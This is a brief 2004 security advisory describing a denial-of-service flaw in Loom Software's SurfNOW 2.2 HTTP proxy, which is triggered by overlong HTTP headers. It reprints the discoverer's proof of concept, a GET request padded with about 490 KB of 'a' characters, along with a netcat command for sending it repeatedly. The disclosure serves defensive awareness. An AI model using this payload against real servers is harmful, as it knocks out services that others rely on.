Reported
January 29, 2004 by Donato Ferrante.
VERSIONS
AFFECTED
Loom Software's SurfNOW
2.2 and earlier
DESCRIPTION
Loom Software's SurfNOW 2.2 and earlier
contains a Denial of Service (DoS) vulnerability. This vulnerability is a result
of a flaw in the way SurfNOW handles long HTTP headers.
DEMONSTRATION
The
discoverer posted the following code as proof of concept:
GET \aaaaaaaaaaaaa\[ 490 kb of a \]aaaa HTTP/1.1\n\n\n
VENDOR
RESPONSE
CREDIT
Discovered by
Donato Ferrante.
NOTE: 490Kb of the character 'a' is being sent.
It is possible to test this bug in another way using NetCat, repetitively:
nc -v -v host 8080 < testFile.txt
( note: "testFile.txt" is a file of 490 Kb as \[1\] )Loom Software has been notified.
Denial of Service Vulnerability in Loomsoft SurfNow! HTTP Proxy
0 comments
Hide comments